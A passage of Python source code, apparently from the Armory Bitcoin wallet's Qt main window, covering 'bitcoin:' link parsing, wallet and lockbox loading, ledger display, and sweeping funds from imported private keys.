'to the Bitcoin network!' % (clickOrEnter, ClickOrEnter), \
QMessageBox.Ok)
return {}
if len(uriDict)==0:
warnMsg = ('It looks like you just %sed a "bitcoin:" link, but '
'that link is malformed. ' % clickOrEnter)
if self.usermode == USERMODE.Standard:
warnMsg += ('Please check the source of the link and enter the '
'transaction manually.')
else:
warnMsg += 'The raw URI string is:\n\n' + uriStr
QMessageBox.warning(self, 'Invalid URI', warnMsg, QMessageBox.Ok)
LOGERROR(warnMsg.replace('\n', ' '))
return {}
if not uriDict.has_key('address'):
QMessageBox.warning(self, 'The "bitcoin:" link you just %sed '
'does not even contain an address! There is nothing that '
'Armory can do with this link!' % clickOrEnter, QMessageBox.Ok)
LOGERROR('No address in "bitcoin:" link! Nothing to do!')
return {}
# Verify the URI is for the same network as this Armory instnance
theAddrByte = checkAddrType(base58_to_binary(uriDict['address']))
if theAddrByte!=-1 and not theAddrByte in [ADDRBYTE, P2SHBYTE]:
net = 'Unknown Network'
if NETWORKS.has_key(theAddrByte):
net = NETWORKS[theAddrByte]
QMessageBox.warning(self, 'Wrong Network!', \
'The address for the "bitcoin:" link you just %sed is '
'for the wrong network! You are on the <b>%s</b> '
'and the address you supplied is for the the '
'<b>%s</b>!' % (clickOrEnter, NETWORKS[ADDRBYTE], net), \
QMessageBox.Ok)
LOGERROR('URI link is for the wrong network!')
return {}
# If the URI contains "req-" strings we don't recognize, throw error
recognized = ['address','version','amount','label','message']
for key,value in uriDict.iteritems():
if key.startswith('req-') and not key[4:] in recognized:
QMessageBox.warning(self,'Unsupported URI', 'The "bitcoin:" link '
'you just %sed contains fields that are required but not '
'recognized by Armory. This may be an older version of Armory, '
'or the link you %sed on uses an exotic, unsupported format.'
'<br><br>The action cannot be completed.' % (clickOrEnter, clickOrEnter), \
QMessageBox.Ok)
LOGERROR('URI link contains unrecognized req- fields.')
return {}
return uriDict
#############################################################################
def uriLinkClicked(self, uriStr):
LOGINFO('uriLinkClicked')
if TheBDM.getState()==BDM_OFFLINE:
QMessageBox.warning(self, 'Offline', \
'You just clicked on a "bitcoin:" link, but Armory is offline '
'and cannot send transactions. Please click the link '
'again when Armory is online.', \
QMessageBox.Ok)
return
elif not TheBDM.getState()==BDM_BLOCKCHAIN_READY:
# BDM isnt ready yet, saved URI strings in the delayed URIDict to
# call later through finishLoadBlockChainGUI
qLen = self.delayedURIData['qLen']
self.delayedURIData[qLen] = uriStr
qLen = qLen +1
self.delayedURIData['qLen'] = qLen
return
uriDict = self.parseUriLink(uriStr, 'click')
if len(uriDict)>0:
self.bringArmoryToFront()
return self.uriSendBitcoins(uriDict)
#############################################################################
def loadWalletsAndSettings(self, updateProgress):
LOGINFO('loadWalletsAndSettings')
self.getSettingOrSetDefault('First_Load', True)
self.getSettingOrSetDefault('Load_Count', 0)
self.getSettingOrSetDefault('User_Mode', 'Advanced')
self.getSettingOrSetDefault('UnlockTimeout', 10)
self.getSettingOrSetDefault('DNAA_UnlockTimeout', False)
# Determine if we need to do new-user operations, increment load-count
self.firstLoad = False
if self.getSettingOrSetDefault('First_Load', True):
self.firstLoad = True
self.writeSetting('First_Load', False)
self.writeSetting('First_Load_Date', long(RightNow()))
self.writeSetting('Load_Count', 1)
self.writeSetting('AdvFeature_UseCt', 0)
else:
self.writeSetting('Load_Count', (self.settings.get('Load_Count')+1) % 100)
# Set the usermode, default to standard
self.usermode = USERMODE.Standard
if self.settings.get('User_Mode') == 'Advanced':
self.usermode = USERMODE.Advanced
elif self.settings.get('User_Mode') == 'Expert':
self.usermode = USERMODE.Expert
# The user may have asked to never be notified of a particular
# notification again. We have a short-term list (wiped on every
# load), and a long-term list (saved in settings). We simply
# initialize the short-term list with the long-term list, and add
# short-term ignore requests to it
notifyStr = self.getSettingOrSetDefault('NotifyIgnore', '')
nsz = len(notifyStr)
self.notifyIgnoreLong = set(notifyStr[8*i:8*(i+1)] for i in range(nsz/8))
self.notifyIgnoreShort = set(notifyStr[8*i:8*(i+1)] for i in range(nsz/8))
# Load wallets found in the .armory directory
self.walletMap = {}
self.walletIndices = {}
self.walletIDSet = set()
# I need some linear lists for accessing by index
self.walletIDList = []
self.walletVisibleList = []
self.wltIDList = []
self.combinedLedger = []
self.ledgerSize = 0
self.ledgerTable = []
self.walletSideScanProgress = {}
LOGINFO('Loading wallets...')
wltPaths = readWalletFiles()
wltExclude = self.settings.get('Excluded_Wallets', expectList=True)
ratioPerWallet = 0
if len(wltPaths) > 0:
ratioPerWallet = 100 / float(len(wltPaths))
i = 0
for fpath in wltPaths:
currentProgress = float(i) * ratioPerWallet
updateProgress(currentProgress)
i += 1
def reportProgress(val):
updateProgress(currentProgress + val*ratioPerWallet
)
try:
wltLoad = PyBtcWallet().readWalletFile(fpath, \
reportProgress=reportProgress)
wltID = wltLoad.uniqueIDB58
if fpath in wltExclude or wltID in wltExclude:
continue
if wltID in self.walletIDSet:
LOGWARN('***WARNING: Duplicate wallet detected, %s', wltID)
wo1 = self.walletMap[wltID].watchingOnly
wo2 = wltLoad.watchingOnly
if wo1 and not wo2:
prevWltPath = self.walletMap[wltID].walletPath
self.walletMap[wltID] = wltLoad
LOGWARN('First wallet is more useful than the second one...')
LOGWARN(' Wallet 1 (loaded): %s', fpath)
LOGWARN(' Wallet 2 (skipped): %s', prevWltPath)
else:
LOGWARN('Second wallet is more useful than the first one...')
LOGWARN(' Wallet 1 (skipped): %s', fpath)
LOGWARN(' Wallet 2 (loaded): %s', self.walletMap[wltID].walletPath)
else:
# Update the maps/dictionaries
self.walletMap[wltID] = wltLoad
self.walletIndices[wltID] = len(self.walletMap)-1
# Maintain some linear lists of wallet info
self.walletIDSet.add(wltID)
self.walletIDList.append(wltID)
wtype = determineWalletType(wltLoad, self)[0]
notWatch = (not wtype == WLTTYPES.WatchOnly)
defaultVisible = self.getWltSetting(wltID, 'LedgerShow', notWatch)
self.walletVisibleList.append(defaultVisible)
wltLoad.mainWnd = self
except:
LOGEXCEPT( '***WARNING: Wallet could not be loaded: %s (skipping)',
fpath)
#raise
LOGINFO('Number of wallets read in: %d', len(self.walletMap))
for wltID, wlt in self.walletMap.iteritems():
dispStr = (' Wallet (%s):' % wlt.uniqueIDB58).ljust(25)
dispStr += '"'+wlt.labelName.ljust(32)+'" '
dispStr += '(Encrypted)' if wlt.useEncryption else '(No Encryption)'
LOGINFO(dispStr)
# Register all wallets with TheBDM
wlt.registerWallet()
# Create one wallet per lockbox to make sure we can query individual
# lockbox histories easily.
if self.usermode==USERMODE.Expert:
LOGINFO('Loading Multisig Lockboxes')
self.loadLockboxesFromFile(MULTISIG_FILE)
# Get the last directory
savedDir = self.settings.get('LastDirectory')
if len(savedDir)==0 or not os.path.exists(savedDir):
savedDir = ARMORY_HOME_DIR
self.lastDirectory = savedDir
self.writeSetting('LastDirectory', savedDir)
updateProgress(100)
#############################################################################
@RemoveRepeatingExtensions
def getFileSave(self, title='Save Wallet File', \
ffilter=['Wallet files (*.wallet)'], \
defaultFilename=None):
LOGDEBUG('getFileSave')
startPath = self.settings.get('LastDirectory')
if len(startPath)==0 or not os.path.exists(startPath):
startPath = ARMORY_HOME_DIR
if not defaultFilename==None:
startPath = os.path.join(startPath, defaultFilename)
types = ffilter
types.append('All files (*)')
typesStr = ';; '.join(types)
# Open the native file save dialog and grab the saved file/path unless
# we're in OS X, where native dialogs sometimes freeze. Looks like a Qt
# issue of some sort. Some experimental code under ArmoryMac that directly
# calls a dialog produces better results but still freezes under some
# circumstances.
if not OS_MACOSX:
fullPath = unicode(QFileDialog.getSaveFileName(self, title, startPath,
typesStr))
else:
fullPath = unicode(QFileDialog.getSaveFileName(self, title, startPath,
typesStr,
options=QFileDialog.DontUseNativeDialog))
fdir,fname = os.path.split(fullPath)
if fdir:
self.writeSetting('LastDirectory', fdir)
return fullPath
#############################################################################
def getFileLoad(self, title='Load Wallet File', \
ffilter=['Wallet files (*.wallet)'], \
defaultDir=None):
LOGDEBUG('getFileLoad')
if defaultDir is None:
defaultDir = self.settings.get('LastDirectory')
if len(defaultDir)==0 or not os.path.exists(defaultDir):
defaultDir = ARMORY_HOME_DIR
types = list(ffilter)
types.append(tr('All files (*)'))
typesStr = ';; '.join(types)
# Open the native file load dialog and grab the loaded file/path unless
# we're in OS X, where native dialogs sometimes freeze. Looks like a Qt
# issue of some sort. Some experimental code under ArmoryMac that directly
# calls a dialog produces better results but still freezes under some
# circumstances.
if not OS_MACOSX:
fullPath = unicode(QFileDialog.getOpenFileName(self, title, defaultDir,
typesStr))
else:
fullPath = unicode(QFileDialog.getOpenFileName(self, title, defaultDir,
typesStr,
options=QFileDialog.DontUseNativeDialog))
self.writeSetting('LastDirectory', os.path.split(fullPath)[0])
return fullPath
##############################################################################
def getWltSetting(self, wltID, propName, defaultValue=''):
# Sometimes we need to settings specific to individual wallets -- we will
# prefix the settings name with the wltID.
wltPropName = 'Wallet_%s_%s' % (wltID, propName)
if self.settings.hasSetting(wltPropName):
return self.settings.get(wltPropName)
else:
if not defaultValue=='':
self.setWltSetting(wltID, propName, defaultValue)
return defaultValue
#############################################################################
def setWltSetting(self, wltID, propName, value):
wltPropName = 'Wallet_%s_%s' % (wltID, propName)
self.writeSetting(wltPropName, value)
#############################################################################
def toggleIsMine(self, wltID):
alreadyMine = self.getWltSetting(wltID, 'IsMine')
if alreadyMine:
self.setWltSetting(wltID, 'IsMine', False)
else:
self.setWltSetting(wltID, 'IsMine', True)
#############################################################################
def loadLockboxesFromFile(self, fn):
self.allLockboxes = []
self.cppLockboxWltMap = {}
if not os.path.exists(fn):
return
lbList = readLockboxesFile(fn)
for lb in lbList:
self.updateOrAddLockbox(lb)
#############################################################################
def updateOrAddLockbox(self, lbObj, isFresh=False):
try:
lbID = lbObj.uniqueIDB58
index = self.lockboxIDMap.get(lbID)
if index is None:
# Add new lockbox to list
self.allLockboxes.append(lbObj)
self.lockboxIDMap[lbID] = len(self.allLockboxes)-1
scraddrReg = script_to_scrAddr(lbObj.binScript)
scraddrP2SH = script_to_scrAddr(script_to_p2sh_script(lbObj.binScript))
scrAddrList = []
scrAddrList.append(scraddrReg)
scrAddrList.append(scraddrP2SH)
self.cppLockboxWltMap[lbID] = lbObj.registerLockbox(scrAddrList, isFresh)
else:
# Replace the original
self.allLockboxes[index] = lbObj
writeLockboxesFile(self.allLockboxes, MULTISIG_FILE)
except:
LOGEXCEPT('Failed to add/update lockbox')
#############################################################################
def removeLockbox(self, lbObj):
lbID = lbObj.uniqueIDB58
index = self.lockboxIDMap.get(lbID)
if index is None:
LOGERROR('Tried to remove lockbox that DNE: %s', lbID)
else:
del self.allLockboxes[index]
self.reconstructLockboxMaps()
writeLockboxesFile(self.allLockboxes, MULTISIG_FILE)
#############################################################################
def reconstructLockboxMaps(self):
self.lockboxIDMap.clear()
for i,box in enumerate(self.allLockboxes):
self.lockboxIDMap[box.uniqueIDB58] = i
#############################################################################
def getLockboxByID(self, boxID):
index = self.lockboxIDMap.get(boxID)
return None if index is None else self.allLockboxes[index]
################################################################################
# Get the lock box ID if the p2shAddrString is found in one of the lockboxes
# otherwise it returns None
def getLockboxByP2SHAddrStr(self, p2shAddrStr):
for lboxId in self.lockboxIDMap.keys():
lbox = self.allLockboxes[self.lockboxIDMap[lboxId]]
if p2shAddrStr == binScript_to_p2shAddrStr(lbox.binScript):
return lbox
return None
#############################################################################
def browseLockboxes(self):
self.lbDialog = DlgLockboxManager(self, self)
self.lbDialog.exec_()
self.lblDialog = None
#############################################################################
def getContribStr(self, binScript, contribID='', contribLabel=''):
"""
This is used to display info for the lockbox interface. It might also be
useful as a general script_to_user_string method, where you have a
binScript and you want to tell the user something about it. However,
it is verbose, so it won't fit in a send-confirm dialog, necessarily.
We should extract as much information as possible without contrib*. This
at least guarantees that we see the correct data for our own wallets
and lockboxes, even if the data for other parties is incorrect.
"""
displayInfo = self.getDisplayStringForScript(binScript, 60, 2)
if displayInfo['WltID'] is not None:
return displayInfo['String'], ('WLT:%s' % displayInfo['WltID'])
elif displayInfo['LboxID'] is not None:
return displayInfo['String'], ('LB:%s' % displayInfo['LboxID'])
scriptType = getTxOutScriptType(binScript)
# At this point, we can use the contrib ID (and know we can't sign it)
if contribID or contribLabel:
if contribID:
if contribLabel:
outStr = 'Contributor "%s" (%s)' % (contribLabel, contribID)
else:
outStr = 'Contributor %s' % contribID
else:
if contribLabel:
outStr = 'Contributor "%s"' % contribLabel
else:
outStr = 'Unknown Contributor'
LOGERROR('How did we get to this impossible else-statement?')
return outStr, ('CID:%s' % contribID)
# If no contrib ID, then salvage anything
astr = displayInfo['AddrStr']
cid = None
if scriptType == CPP_TXOUT_MULTISIG:
M,N,a160s,pubs = getMultisigScriptInfo(binScript)
dispStr = 'Unrecognized Multisig %d-of-%d: P2SH=%s' % (M,N,astr)
cid = 'MS:%s' % astr
elif scriptType == CPP_TXOUT_P2SH:
dispStr = 'Unrecognized P2SH: %s' % astr
cid = 'P2SH:%s' % astr
elif scriptType in CPP_TXOUT_HAS_ADDRSTR:
dispStr = 'Address: %s' % astr
cid = 'ADDR:%s' % astr
else:
dispStr = 'Non-standard: P2SH=%s' % astr
cid = 'NS:%s' % astr
return dispStr, cid
#############################################################################
def getWalletForAddr160(self, addr160):
for wltID, wlt in self.walletMap.iteritems():
if wlt.hasAddr(addr160):
return wltID
return ''
#############################################################################
def getWalletForScrAddr(self, scrAddr):
for wltID, wlt in self.walletMap.iteritems():
if wlt.hasScrAddr(scrAddr):
return wltID
return ''
#############################################################################
def getSettingOrSetDefault(self, settingName, defaultVal):
s = self.settings.getSettingOrSetDefault(settingName, defaultVal)
return s
#############################################################################
def writeSetting(self, settingName, val):
self.settings.set(settingName, val)
# NB: armoryd has a similar function (Armory_Daemon::start()), and both share
# common functionality in ArmoryUtils (finishLoadBlockchainCommon). If you
# mod this function, please be mindful of what goes where, and make sure
# any critical functionality makes it into armoryd.
def finishLoadBlockchainGUI(self):
# Let's populate the wallet info after finishing loading the blockchain.
self.setDashboardDetails()
self.memPoolInit = True
self.createCombinedLedger()
self.ledgerSize = len(self.combinedLedger)
self.statusBar().showMessage('Blockchain loaded, wallets sync\'d!', 10000)
if self.netMode==NETWORKMODE.Full:
LOGINFO('Current block number: %d', TheBDM.getTopBlockHeight())
self.lblArmoryStatus.setText(\
'<font color=%s>Connected (%s blocks)</font> ' %
(htmlColor('TextGreen'), TheBDM.getTopBlockHeight()))
currSyncSuccess = self.getSettingOrSetDefault("SyncSuccessCount", 0)
self.writeSetting('SyncSuccessCount', min(currSyncSuccess+1, 10))
if self.getSettingOrSetDefault('NotifyBlkFinish',True):
reply,remember = MsgBoxWithDNAA(self, self, MSGBOX.Info, \
'Blockchain Loaded!', 'Blockchain loading is complete. '
'Your balances and transaction history are now available '
'under the "Transactions" tab. You can also send and '
'receive bitcoins.', \
dnaaMsg='Do not show me this notification again ', yesStr='OK')
if remember==True:
self.writeSetting('NotifyBlkFinish',False)
self.mainDisplayTabs.setCurrentIndex(self.MAINTABS.Ledger)
self.netMode = NETWORKMODE.Full
self.settings.set('FailedLoadCount', 0)
# This will force the table to refresh with new data
self.updateAnnounceTab() # make sure satoshi version info is up to date
self.removeBootstrapDat() # if we got here, we're *really* done with it
self.walletModel.reset()
qLen = self.delayedURIData['qLen']
if qLen > 0:
#delayed URI parses, feed them back to the uri parser now
for i in range(0, qLen):
uriStr = self.delayedURIData[qLen-i-1]
self.delayedURIData['qLen'] = qLen -i -1
self.uriLinkClicked(uriStr)
#############################################################################
def removeBootstrapDat(self):
bfile = os.path.join(BTC_HOME_DIR, 'bootstrap.dat.old')
if os.path.exists(bfile):
os.remove(bfile)
#############################################################################
def changeLedgerSorting(self, col, order):
"""
The direct sorting was implemented to avoid having to search for comment
information for every ledger entry. Therefore, you can't sort by comments
without getting them first, which is the original problem to avoid.
"""
if col in (LEDGERCOLS.NumConf, LEDGERCOLS.DateStr, \
LEDGERCOLS.Comment, LEDGERCOLS.Amount, LEDGERCOLS.WltName):
self.sortLedgCol = col
self.sortLedgOrder = order
self.createCombinedLedger()
#############################################################################
def createCombinedLedger(self, resetMainLedger=False):
"""
Create a ledger to display on the main screen, that consists of ledger
entries of any SUBSET of available wallets.
"""
bdmState = TheBDM.getState()
self.combinedLedger = []
#self.combinedLedger.extend(TheBDM.bdv().getWalletsHistoryPage(self.mainLedgerCurrentPage -1))
totalFunds = 0
spendFunds = 0
unconfFunds = 0
if bdmState == BDM_BLOCKCHAIN_READY:
for wltID in self.wltIDList:
wlt = self.walletMap[wltID]
totalFunds += wlt.getBalance('Total')
spendFunds += wlt.getBalance('Spendable')
unconfFunds += wlt.getBalance('Unconfirmed')
self.ledgerSize = len(self.combinedLedger)
# Many MainWindow objects haven't been created yet...
# let's try to update them and fail silently if they don't exist
try:
if bdmState in (BDM_OFFLINE, BDM_SCANNING):
self.lblTotalFunds.setText( '-'*12 )
self.lblSpendFunds.setText( '-'*12 )
self.lblUnconfFunds.setText('-'*12 )
return
uncolor = htmlColor('MoneyNeg') if unconfFunds>0 else htmlColor('Foreground')
btccolor = htmlColor('DisableFG') if spendFunds==totalFunds else htmlColor('MoneyPos')
lblcolor = htmlColor('DisableFG') if spendFunds==totalFunds else htmlColor('Foreground')
goodColor= htmlColor('TextGreen')
self.lblTotalFunds.setText( '<b><font color="%s">%s</font></b>' % (btccolor,coin2str(totalFunds)))
self.lblTot.setText('<b><font color="%s">Maximum Funds:</font></b>' % lblcolor)
self.lblBTC1.setText('<b><font color="%s">BTC</font></b>' % lblcolor)
self.lblSpendFunds.setText( '<b><font color=%s>%s</font></b>' % (goodColor, coin2str(spendFunds)))
self.lblUnconfFunds.setText('<b><font color="%s">%s</font></b>' % \
(uncolor, coin2str(unconfFunds)))
if resetMainLedger == False:
self.ledgerModel.reset()
else:
self.ledgerView.goToTop()
except AttributeError:
raise
if not self.usermode==USERMODE.Expert:
return
# In expert mode, we're updating the lockbox info, too
try:
self.lockboxLedgModel.reset()
except:
LOGEXCEPT('Failed to update lockbox ledger')
#############################################################################
def getCommentForLockboxTx(self, lboxId, le):
commentSet = set([])
lbox = self.allLockboxes[self.lockboxIDMap[lboxId]]
for a160 in lbox.a160List:
wltID = self.getWalletForAddr160(a160)
if wltID:
commentSet.add(self.walletMap[wltID].getCommentForLE(le))
return ' '.join(commentSet)
#############################################################################
def convertLedgerToTable(self, ledger, showSentToSelfAmt=True, wltIDIn=None):
table2D = []
datefmt = self.getPreferredDateFormat()
for le in ledger:
if wltIDIn is None:
wltID = le.getWalletID()
else:
wltID = wltIDIn
row = []
wlt = self.walletMap.get(wltID)
if wlt:
isWatch = (determineWalletType(wlt, self)[0] == WLTTYPES.WatchOnly)
wltName = wlt.labelName
dispComment = self.getCommentForLE(le, wltID)
else:
lboxId = wltID
lbox = self.getLockboxByID(lboxId)
if not lbox:
continue
isWatch = True
wltName = '%s-of-%s: %s (%s)' % (lbox.M, lbox.N, lbox.shortName, lboxId)
dispComment = self.getCommentForLockboxTx(lboxId, le)
nConf = TheBDM.getTopBlockHeight() - le.getBlockNum()+1
if le.getBlockNum()>=0xffffffff:
nConf=0
# If this was sent-to-self... we should display the actual specified
# value when the transaction was executed. This is pretty difficult
# when both "recipient" and "change" are indistinguishable... but
# They're actually not because we ALWAYS generate a new address to
# for change , which means the change address MUST have a higher
# chain index
amt = le.getValue()
if le.isSentToSelf() and wlt and showSentToSelfAmt:
amt = determineSentToSelfAmt(le, wlt)[0]
# NumConf
row.append(nConf)
# UnixTime (needed for sorting)
row.append(le.getTxTime())
# Date
row.append(unixTimeToFormatStr(le.getTxTime(), datefmt))
# TxDir (actually just the amt... use the sign of the amt to determine dir)
row.append(coin2str(le.getValue(), maxZeros=2))
# Wlt Name
row.append(wltName)
# Comment
row.append(dispComment)
# Amount
row.append(coin2str(amt, maxZeros=2))
# Is this money mine?
row.append(isWatch)
# ID to display (this might be the lockbox ID)
row.append( wltID )
# TxHash
row.append( binary_to_hex(le.getTxHash() ))
# Is this a coinbase/generation transaction
row.append( le.isCoinbase() )
# Sent-to-self
row.append( le.isSentToSelf() )
# Finally, attach the row to the table
table2D.append(row)
return table2D
#############################################################################
def walletListChanged(self):
self.walletModel.reset()
self.populateLedgerComboBox()
self.changeWltFilter()
#############################################################################
def populateLedgerComboBox(self):
self.comboWltSelect.clear()
self.comboWltSelect.addItem( 'My Wallets' )
self.comboWltSelect.addItem( 'Offline Wallets' )
self.comboWltSelect.addItem( 'Other\'s wallets' )
self.comboWltSelect.addItem( 'All Wallets' )
self.comboWltSelect.addItem( 'Custom Filter' )
for wltID in self.walletIDList:
self.comboWltSelect.addItem( self.walletMap[wltID].labelName )
self.comboWltSelect.insertSeparator(5)
self.comboWltSelect.insertSeparator(5)
comboIdx = self.getSettingOrSetDefault('LastFilterState', 0)
self.comboWltSelect.setCurrentIndex(comboIdx)
#############################################################################
def execDlgWalletDetails(self, index=None):
if len(self.walletMap)==0:
reply = QMessageBox.information(self, 'No Wallets!', \
'You currently do not have any wallets. Would you like to '
'create one, now?', QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
self.startWalletWizard()
return
if index==None:
index = self.walletsView.selectedIndexes()
if len(self.walletMap)==1:
self.walletsView.selectRow(0)
index = self.walletsView.selectedIndexes()
elif len(index)==0:
QMessageBox.warning(self, 'Select a Wallet', \
'Please select a wallet on the right, to see its properties.', \
QMessageBox.Ok)
return
index = index[0]
wlt = self.walletMap[self.walletIDList[index.row()]]
dialog = DlgWalletDetails(wlt, self.usermode, self, self)
self.walletDialogDict[wlt.uniqueIDB58] = dialog
dialog.exec_()
if wlt.uniqueIDB58 in self.walletDialogDict:
del self.walletDialogDict[wlt.uniqueIDB58]
#############################################################################
def execClickRow(self, index=None):
row,col = index.row(), index.column()
if not col==WLTVIEWCOLS.Visible:
return
wltID = self.walletIDList[row]
currEye = self.walletVisibleList[row]
self.walletVisibleList[row] = not currEye
self.setWltSetting(wltID, 'LedgerShow', not currEye)
if TheBDM.getState()==BDM_BLOCKCHAIN_READY:
self.changeWltFilter()
#############################################################################
def updateTxCommentFromView(self, view):
index = view.selectedIndexes()[0]
row, col = index.row(), index.column()
currComment = str(view.model().index(row, LEDGERCOLS.Comment).data().toString())
wltID = str(view.model().index(row, LEDGERCOLS.WltID ).data().toString())
txHash = str(view.model().index(row, LEDGERCOLS.TxHash ).data().toString())
dialog = DlgSetComment(self, self, currComment, 'Transaction')
if dialog.exec_():
newComment = str(dialog.edtComment.text())
self.walletMap[wltID].setComment(hex_to_binary(txHash), newComment)
self.walletListChanged()
#############################################################################
def updateAddressCommentFromView(self, view, wlt):
index = view.selectedIndexes()[0]
row, col = index.row(), index.column()
currComment = str(view.model().index(row, ADDRESSCOLS.Comment).data().toString())
addrStr = str(view.model().index(row, ADDRESSCOLS.Address).data().toString())
dialog = DlgSetComment(self, self, currComment, 'Address')
if dialog.exec_():
newComment = str(dialog.edtComment.text())
atype, addr160 = addrStr_to_hash160(addrStr)
if atype==P2SHBYTE:
LOGWARN('Setting comment for P2SH address: %s' % addrStr)
wlt.setComment(addr160, newComment)
#############################################################################
def getAddrCommentIfAvailAll(self, txHash):
if not TheBDM.getState()==BDM_BLOCKCHAIN_READY:
return ''
else:
appendedComments = []
for wltID,wlt in self.walletMap.iteritems():
cmt = wlt.getAddrCommentIfAvail(txHash)
if len(cmt)>0:
appendedComments.append(cmt)
return '; '.join(appendedComments)
#############################################################################
def getCommentForLE(self, le, wltID=None):
# Smart comments for LedgerEntry objects: get any direct comments ...
# if none, then grab the one for any associated addresses.
if wltID is None:
wltID = le.getWalletID()
return self.walletMap[wltID].getCommentForLE(le)
#############################################################################
def addWalletToApplication(self, newWallet, walletIsNew=False):
LOGINFO('addWalletToApplication')
newWallet.registerWallet(walletIsNew)
# Update the maps/dictionaries
newWltID = newWallet.uniqueIDB58
if self.walletMap.has_key(newWltID):
return
self.walletMap[newWltID] = newWallet
self.walletIndices[newWltID] = len(self.walletMap)-1
# Maintain some linear lists of wallet info
self.walletIDSet.add(newWltID)
self.walletIDList.append(newWltID)
showByDefault = (determineWalletType(newWallet, self)[0] != WLTTYPES.WatchOnly)
self.walletVisibleList.append(showByDefault)
self.setWltSetting(newWltID, 'LedgerShow', showByDefault)
self.walletListChanged()
self.mainWnd = self
#############################################################################
def removeWalletFromApplication(self, wltID):
LOGINFO('removeWalletFromApplication')
idx = -1
try:
idx = self.walletIndices[wltID]
except KeyError:
LOGERROR('Invalid wallet ID passed to "removeWalletFromApplication"')
raise WalletExistsError
self.walletMap[wltID].unregisterWallet()
del self.walletMap[wltID]
del self.walletIndices[wltID]
self.walletIDSet.remove(wltID)
del self.walletIDList[idx]
del self.walletVisibleList[idx]
# Reconstruct walletIndices
for i,wltID in enumerate(self.walletIDList):
self.walletIndices[wltID] = i
self.walletListChanged()
#############################################################################
def RecoverWallet(self):
DlgWltRecoverWallet(self, self).promptWalletRecovery()
#############################################################################
def createSweepAddrTx(self, sweepFromAddrObjList, sweepToScript):
"""
This method takes a list of addresses (likely just created from private
key data), finds all their unspent TxOuts, and creates a signed tx that
transfers 100% of the funds to the sweepTO160 address. It doesn't
actually execute the transaction, but it will return a broadcast-ready
PyTx object that the user can confirm. TxFee is automatically calc'd
and deducted from the output value, if necessary.
"""
LOGINFO('createSweepAddrTx')
if not isinstance(sweepFromAddrObjList, (list, tuple)):
sweepFromAddrObjList = [sweepFromAddrObjList]
addr160List = [a.getAddr160() for a in sweepFromAddrObjList]
utxoList = getUnspentTxOutsForAddr160List(addr160List)
if len(utxoList)==0:
return [None, 0, 0]
outValue = sumTxOutList(utxoList)
inputSide = []
for utxo in utxoList:
# The PyCreateAndSignTx method require PyTx and PyBtcAddress objects
rawTx = TheBDM.bdv().getTxByHash(utxo.getTxHash()).serialize()
a160 = CheckHash160(utxo.getRecipientScrAddr())
for aobj in sweepFromAddrObjList:
if a160 == aobj.getAddr160():
pubKey = aobj.binPublicKey65.toBinStr()
txoIdx = utxo.getTxOutIndex()
inputSide.append(UnsignedTxInput(rawTx, txoIdx, None, pubKey))
break
minFee = calcMinSuggestedFees(utxoList, outValue, 0, 1)
if minFee > 0:
LOGDEBUG( 'Subtracting fee from Sweep-output')
outValue -= minFee
if outValue<=0:
return [None, outValue, minFee]
# Creating the output list is pretty easy...
outputSide = []
outputSide.append(DecoratedTxOut(sweepToScript, outValue))
try:
# Make copies, destroy them in the finally clause
privKeyMap = {}
for addrObj in sweepFromAddrObjList:
scrAddr = SCRADDR_P2PKH_BYTE + addrObj.getAddr160()
privKeyMap[scrAddr] = addrObj.binPrivKey32_Plain.copy()
pytx = PyCreateAndSignTx(inputSide, outputSide, privKeyMap)
return (pytx, outValue, minFee)
finally:
for scraddr in privKeyMap:
privKeyMap[scraddr].destroy()
#############################################################################
def confirmSweepScan(self, pybtcaddrList, targAddr160):
LOGINFO('confirmSweepScan')
gt1 = len(self.sweepAfterScanList)>1
if len(self.sweepAfterScanList) > 0:
QMessageBox.critical(self, 'Already Sweeping',
'You are already in the process of scanning the blockchain for '
'the purposes of sweeping other addresses. You cannot initiate '
'sweeping new addresses until the current operation completes. '
'<br><br>'
'In the future, you may select "Multiple Keys" when entering '
'addresses to sweep. There is no limit on the number that can be '
'specified, but they must all be entered at once.', QMessageBox.Ok)
# Destroy the private key data
for addr in pybtcaddrList:
addr.binPrivKey32_Plain.destroy()
return False
confirmed=False
if TheBDM.getState() in (BDM_OFFLINE, BDM_UNINITIALIZED):
#LOGERROR('Somehow ended up at confirm-sweep while in offline mode')
#QMessageBox.info(self, 'Armory is Offline', \
#'Armory is currently in offline mode. You must be in online '
#'mode to initiate the sweep operation.')
nkey = len(self.sweepAfterScanList)
strPlur = 'addresses' if nkey>1 else 'address'
QMessageBox.info(self, 'Armory is Offline', \
'You have chosen to sweep %d %s, but Armory is currently '
'in offline mode. The sweep will be performed the next time you '
'go into online mode. You can initiate online mode (if available) '
'from the dashboard in the main window.' (nkey,strPlur), QMessageBox.Ok)
confirmed=True
else:
msgConfirm = ( \
'Armory must scan the global transaction history in order to '
'find any bitcoins associated with the %s you supplied. '
'Armory will go into offline mode temporarily while the scan '
'is performed, and you will not have access to balances or be '
'able to create transactions. The scan may take several minutes.'
'<br><br>' % ('keys' if gt1 else 'key'))
if TheBDM.getState()==BDM_SCANNING:
msgConfirm += ( \
'There is currently another scan operation being performed. '
'Would you like to start the sweep operation after it completes? ')
elif TheBDM.getState()==BDM_BLOCKCHAIN_READY:
msgConfirm += ( \
'<b>Would you like to start the scan operation right now?</b>')
msgConfirm += ('<br><br>Clicking "No" will abort the sweep operation')
confirmed = QMessageBox.question(self, 'Confirm Rescan', msgConfirm, \
QMessageBox.Yes | QMessageBox.No)
if confirmed==QMessageBox.Yes:
for addr in pybtcaddrList:
TheBDM.registerImportedScrAddr(Hash160ToScrAddr(addr.getAddr160()))
self.sweepAfterScanList = pybtcaddrList
self.sweepAfterScanTarg = targAddr160
self.setDashboardDetails()
return True
#############################################################################
def finishSweepScan(self, wlt, sweepList, sweepAfterScanTarget):
LOGINFO('finishSweepScan')
self.sweepAfterScanList = []
#######################################################################
# The createSweepTx method will return instantly because the blockchain
# has already been rescanned, as described above
targScript = scrAddr_to_script(SCRADDR_P2PKH_BYTE + sweepAfterScanTarget)
finishedTx, outVal, fee = self.createSweepAddrTx(sweepList, targScript)
gt1 = len(sweepList)>1
if finishedTx==None:
if (outVal,fee)==(0,0):
QMessageBox.critical(self, 'Nothing to do', \
'The private %s you have provided does not appear to contain '
'any funds. There is nothing to sweep.' % ('keys' if gt1 else 'key'), \
QMessageBox.Ok)
return
else:
pladdr = ('addresses' if gt1 else 'address')
QMessageBox.critical(self, 'Cannot sweep',\
'You cannot sweep the funds from the %s you specified, because '
